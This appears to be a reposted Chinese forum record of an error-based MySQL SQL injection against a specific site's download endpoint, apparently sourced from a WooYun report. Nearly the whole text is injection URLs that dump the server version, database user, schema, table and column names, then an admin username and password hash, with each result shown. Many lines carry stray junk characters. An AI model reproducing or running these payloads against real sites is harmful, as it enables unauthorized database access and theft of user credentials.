php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666

* u! q, x  \+ X9 r之前想找个测试 没想到这有 可以测试下做个记录而已
2 w- M8 U+ s" P2 t8 {3 c, B
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
) C: T9 K1 D' J+ f
/data0/htdocs/leqi_new/app/myapp.php

或者
5 l3 V9 b: S6 E( _$ Y( s
7 f# N. q  S) M/ |$ l; J2 t/**********version()**********/ 5.1.49-log
1 U3 [% y6 j0 v  U3 t4 Y/ }; ]http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

7 C2 f2 x# I, C/**********user()**********/  
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 z* L# i1 B" }" e2 j% }
% q5 Z! I: k( I! x$ ~  T/**********database()**********/  leqi
- I5 Q$ {) [  n1 Vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

3 ~3 Z0 H0 {7 O/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
8 B9 f& e4 _+ B3 _! o5 _8 jleqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' ]# o' s# m1 N( F; f% Qtest
2 a8 g: z& Q* c% f' M! E7 V, ~
) O! T0 e) E) W; {: m* r, v/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

( F$ t8 j8 {. i% _! T# a  s# b/**********limit依次递归爆字段名**********/
5 u" M- ^1 w/ r! N$ Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
) x% J5 Q  R3 |0 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
, g1 y4 h& X. \9 O, E: q11 21
! s1 i: m7 k! H# h3 Hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# k- E0 J& H% I1 x0 V/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
( b9 d% G5 b+ t# E! hhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
$ ?4 N! S3 c# W: K4 A! Dadmin
2 {. Y( a! ^5 t5 |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
: B; f6 a4 F1 U6a8b4574ca231eb8bd52764d4978ffcd
% A: m) f# H' x5 [0 D, @

# E" U8 H6 p2 B' s+ m; ^